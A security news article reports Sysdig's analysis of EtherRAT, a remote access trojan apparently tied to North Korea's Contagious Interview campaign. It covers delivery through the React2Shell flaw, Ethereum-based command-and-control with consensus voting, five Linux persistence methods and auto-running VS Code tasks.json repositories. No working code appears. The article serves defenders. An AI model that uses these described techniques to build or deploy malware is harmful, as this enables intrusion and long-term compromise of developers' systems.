Threat actors with ties to North Korea have likely become the latest to exploit the recently disclosed critical security React2Shell flaw in React Server Components (RSC) to deliver a previously undocumented remote access trojan dubbed EtherRAT.
"EtherRAT leverages Ethereum smart contracts for command-and-control (C2) resolution, deploys five independent Linux persistence mechanisms, and downloads its own Node.js runtime from nodejs.org," Sysdig said in a report published Monday.
The cloud security firm said the activity exhibits significant overlap with a long-running campaign codenamed Contagious Interview, which has been observed leveraging the EtherHiding technique to distribute malware since February 2025.
Contagious Interview is the name given to a series of attacks in which blockchain and Web3 developers, among others, are targeted through fake job interviews, coding assignments, and video assessments, leading to the deployment of malware. These efforts typically begin with a ruse that lures victims via platforms like LinkedIn, Upwork, or Fiverr, where the threat actors pose as recruiters offering lucrative job opportunities.
According to software supply chain security company Socket, it's one of the most prolific campaigns exploiting the npm ecosystem, highlighting their ability to adapt to JavaScript and cryptocurrency-centric workflows.
The attack chain commences with the exploitation of CVE-2025-55182 (CVSS score: 10.0), a maximum-severity security vulnerability in RSC, to execute a Base64-encoded shell command that downloads and runs a shell script responsible for deploying the main JavaScript implant.
The shell script is retrieved using a curl command, with wget and python3 used as fallbacks. It is also designed to prepare the environment by downloading Node.js v20.10.0 from nodejs.org, following which it writes to disk an encrypted blob and an obfuscated JavaScript dropper. Once all these steps are complete, it proceeds to delete the shell script to minimize the forensic trail and runs the dropper.
The primary goal of the dropper is to decrypt the EtherRAT payload with a hard-coded key and spawn it using the downloaded Node.js binary. The malware is notable for using EtherHiding to fetch the C2 server URL from an Ethereum smart contract every five minutes, allowing the operators to update the URL easily, even if it's taken down.
"What makes this implementation unique is its use of consensus voting across nine public Ethereum remote procedure call (RPC) endpoints," Sysdig said. "EtherRAT queries all nine endpoints in parallel, collects responses, and selects the URL returned by the majority."
"This consensus mechanism protects against several attack scenarios: a single compromised RPC endpoint cannot redirect bots to a sinkhole, and researchers cannot poison C2 resolution by operating a rogue RPC node."
It's worth noting that a similar implementation was previously observed in two npm packages named colortoolsv2 and mimelib2 that were found to deliver downloader malware on developer systems.
Once EtherRAT establishes contact with the C2 server, it enters a polling loop that executes every 500 milliseconds, interpreting any response that's longer than 10 characters as JavaScript code to be run on the infected machine. Persistence is accomplished by using five different methods -
- Systemd user service
- XDG autostart entry
- Cron jobs
- .bashrc injection
- Profile injection
By using multiple mechanisms, the threat actors can ensure the malware runs even after a system reboot and grants them continued access to the infected systems. Another sign that points to the malware's sophistication is the self-update ability that overwrites itself with the new code received from the C2 server after sending its own source code to an API endpoint.
It then launches a new process with the updated payload. What's notable here is that the C2 returns a functionally identical but differently obfuscated version, thereby possibly allowing it to bypass static signature-based detection.
In addition to the use of EtherHiding, the links to Contagious Interview stem from overlaps between the encrypted loader pattern used in EtherRAT and a known JavaScript information stealer and downloader named BeaverTail.
"EtherRAT represents a significant evolution in React2Shell exploitation, moving beyond opportunistic cryptomining and credential theft toward persistent, stealthy access designed for long-term operations," Sysdig said.
"Whether this represents North Korean actors pivoting to new exploitation vectors or sophisticated technique borrowing by another actor, the result is the same: defenders face a challenging new implant that resists traditional detection and takedown methods."
Contagious Interview Shifts from npm to VS Code
The disclosure comes as OpenSourceMalware revealed details of a new Contagious Interview variant that urges victims to clone a malicious repository on GitHub, GitLab, or Bitbucket as part of a programming assignment, and launch the project in Microsoft Visual Studio Code (VS Code).
This results in the execution of a VS Code tasks.json file due to it being configured with runOptions.runOn: 'folderOpen,' causing it to auto-run as soon as the project is opened. The file is engineered to download a loader script using curl or wget based on the operating system of the compromised host.
In the case of Linux, the next stage is a shell script that downloads and runs another shell script named "vscode-bootstrap.sh," which then fetches two more files, "package.json" and "env-setup.js," the latter of which serves as a launchpad for BeaverTail and InvisibleFerret.
OpenSourceMalware said it identified 13 different versions of this campaign spread across 27 different GitHub users and 11 different versions of BeaverTail. The earliest repository ("github[.]com/MentarisHub121/TokenPresaleApp") dates back to April 22, 2025, and the most recent version ("github[.]com/eferos93/test4") was created on December 1, 2025.
"DPRK threat actors have flocked to Vercel, and are now using it almost exclusively," the OpenSourceMalware team said. "We don't know why, but Contagious Interview has stopped using Fly.io, Platform.sh, Render and other hosting providers."
